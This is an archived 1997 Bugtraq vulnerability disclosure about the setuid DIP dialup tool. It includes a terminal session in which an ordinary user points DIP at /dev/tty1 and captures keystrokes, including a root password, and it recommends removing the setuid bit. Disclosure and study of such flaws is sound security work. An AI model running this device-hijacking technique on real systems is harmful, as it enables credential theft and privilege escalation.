[4384] in bugtraq

home help back first fref pref prev next nref lref last post

Yet Another DIP Exploit?

daemon@ATHENA.MIT.EDU (George Staikos)
Wed Apr 30 04:10:14 1997

Date: 	Wed, 30 Apr 1997 01:23:28 -0400
Reply-To: George Staikos <staikos@0WNED.ORG>
From: George Staikos <staikos@0WNED.ORG>
To: BUGTRAQ@NETSPACE.ORG

   I seem to have stumbled across another vulnerability in DIP.  It
appears to allow any user to gain control of arbitrary devices in /dev.
For instance, I have successfully stolen keystrokes from a root login as
follows...  (I could also dump characters to the root console)

$ whoami
cesaro
$ cat < /dev/tty1                    <------ root login here
bash: /dev/tty1: Permission denied   <------ nope, we can see it
$ dip -t
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.

DIP> port tty1
DIP> echo on
DIP> term
[ Entering TERMINAL mode.  Use CTRL-] to get back ]
roots_password                       <------ OH, maybe we *CAN* see it!
[ Back to LOCAL mode. ]
DIP> quit
$

I'm sure there are many more creative things to do with this, but this is
the first thing that came to mind when I discovered it, and is a good
example of what can be done.  Not all devices are accessible.  I have not
looked into the patch at this time, but I recommend chmod u-s dip, as
usual! :)

George

home help back first fref pref prev next nref lref last post